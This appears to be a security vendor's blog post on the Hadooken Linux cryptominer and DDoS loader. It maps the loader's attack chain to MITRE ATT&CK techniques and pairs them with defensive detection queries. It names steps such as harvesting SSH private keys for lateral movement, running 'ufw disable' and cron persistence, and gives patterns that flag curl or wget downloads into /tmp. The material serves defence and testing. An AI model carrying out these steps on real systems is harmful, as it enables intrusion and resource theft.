On September 12, 2024, AquaSec reported the identification of a new Linux-based malware during an intrusion chain that abused misconfigurations on public-facing Oracle Weblogic Servers.

Days later, on September 17, Sekoia’s Threat Detection & Research (TDR) team identified a similar intrusion chain in which two critical Remote Code Execution (RCE) vulnerabilities, CVE-2017-10271 and CVE-2020-14883, were exploited to gain initial access to the system.

Hadooken, also known as K4Spreader, is a Linux-based loader that includes an XMRig-based cryptominer known as PwnRig, designed to mine Monero via a private proxy mining pool, and the Tsunami malware, used to transform the system into a Distributed Denial of Service (DDoS) bot.

AttackIQ has released a new attack graph that brings together the post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by Hadooken to help customers validate their security controls and their ability to defend against this disruptive threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against behaviors associated with the Hadooken malware.
  • Assess their security posture against an opportunistic adversary looking to consume computing resources.
  • Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on cryptomining activities.

Hadooken Malware – 2024-09 – Complete Infection Chain

On September 12, 2024, AquaSec reported the identification of a new Linux-based malware during an intrusion chain that abused misconfigurations on public-facing Oracle Weblogic Servers.

Days later, on September 17, Sekoia’s Threat Detection & Research (TDR) team identified a similar intrusion chain in which two critical Remote Code Execution (RCE) vulnerabilities, CVE-2017-10271 and CVE-2020-14883, were exploited to gain initial access to the system.

Initial Access & Lateral Movement – Malware Deployment and Spreading

This stage begins with the execution of a base64 encoded payload, which downloads a malicious Python script via the Python Requests module. This Python script then attempts to download and save a sample of the Hadooken malware. On first run, a hidden file is created to mark that the script has ran, preventing redundant execution. Finally, root and user home directories are searched for private SSH keys. Any discovered keys are used for lateral movement into other systems, allowing for the spread of the Hadooken malware.

Deobfuscate/Decode Files or Information (T1140): This scenario uses the base64 utility to deobfuscate a base64 encoded payload. Please be aware that this step is configured with the exact base64 encoded string provided in multiple CTI reports which is responsible for the deployment of the Hadooken malware. This string was added to more closely emulate the IOCs presented in the reports. However, while the string is decoded during this scenario it is important to emphasize that it will not be executed and would be extremely risky to execute it manually.

Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in two separate steps in order to test network and endpoint controls and their ability to prevent the delivery of known malicious content.

Hide Artifacts: Hidden Files and Directories (T1564.001): This scenario hides files in the filesystem through the execution of a batch script. Enabling the hidden attribute is an attempt to prevent malicious files from being detected by defenders.

Unsecured Credentials: Private Keys (T1552.004): This scenario uses the find utility to discover SSH private keys that may exist within the root or user home directories. SSH keys can provide opportunities for lateral movement and facilitate the spread of malware to other systems within an environment.

Remote Services: SSH (T1021.004): When configured, this scenario will emulate lateral movement to adjacent Linux systems over SSH.

Discovery & Defense Evasion – Hadooken Malware Deployment

This stage performs the deployment of the Hadooken malware and follow-up discovery and defense evasion activities. Once executed, Hadooken begins collecting system information such as the current user context, operating system type, and mounted filesystems. Lastly, Hadooken will attempt to evade defenses by disabling the Uncomplicated Firewall.

System Owner/User Discovery (T1033): Often during discovery and reconnaissance, threat actors will leverage native utilities to obtain information pertaining a systems user account. This scenario uses the whoami command to determine the current logged on user.

System Information Discovery (T1082): This scenario obtains information pertaining to the Linux kernel version running on the system using the command uname -v.

System Information Discovery (T1082): This scenario uses the virtual file /proc/mounts to enumerate the currently mounted filesystems on the host, displaying their type (e.g., Ext4, XFS, Btrfs), mount point, and mount options.

Impair Defenses: Disable or Modify System Firewall (T1562.004): This scenario attempts to disable the Uncomplicated Firewall using the command ufw disable in order to impair system defenses and ensure network connectivity to both local and external malicious services.

Impact – Linux Cryptominer Execution

This stage focuses on the deployment of the packaged cryptomining component contained within Hadooken. Once on the system, this component is unpacked and executed. Cronjobs are created for various time intervals to ensure its persistence and execution.

Scheduled Task/Job: Cron (T1053.003): This scenario leverages the cron utility, a job scheduler native to Unix-like operating systems, to demonstrate how threat actors use scheduled command executions to ensure persistence.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

ProcessCommandLine contains (“curl” or “wget” or “lwp-download”) and ProcessCommandLine contains “/tmp”

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. Remote Services: SSH (T1021.004):

Adversaries may use Valid Accounts to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

2a. Detection

For Linux systems, the Audit framework (auditd) can be utilized to monitor the creation of SSH-related processes, such as ssh, and track any modifications to SSH log files, which store information about logged-in accounts. Additionally, monitoring for newly established network connections, particularly on port 22, can help detect potential SSH logins using valid accounts to access remote machines.

2b. Mitigation

MITRE ATT&CK recommends the following mitigation recommendations:

3. Scheduled Task/Job: Cron (T1053.003)

Adversaries may abuse the Linux task scheduling utility, cron, to perform scheduled or recurring execution of malicious code for initial access or persistence. There are multiple ways to create or modify existing cronjobs on Linux systems. For example, cronjobs can be set system-wide by using the the cron configurations directory in /etc/cron.d or the preconfigured interval cron files, such as /etc/cron.hourly. Similarly, users can define their own scheduled jobs using the crontab utility.

3a. Detection

With an EDR or SIEM Platform, you can detect the following commands being issued to schedule a malicious task.

FolderPath startswith (“/etc/cron.d/*” or “/etc/cron.daily/*” or “/etc/cron.hourly/*” or “/etc/cron.weekly/*” or “/etc/cron.monthly/*” or “/var/spool/cron/crontabs/*”) or FolderPath contains (“/etc/cron.allow” or “/etc/cron.deny” or “/etc/crontab/*”)

3b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Scheduled Task

Wrap-up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by Hadooken operators. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.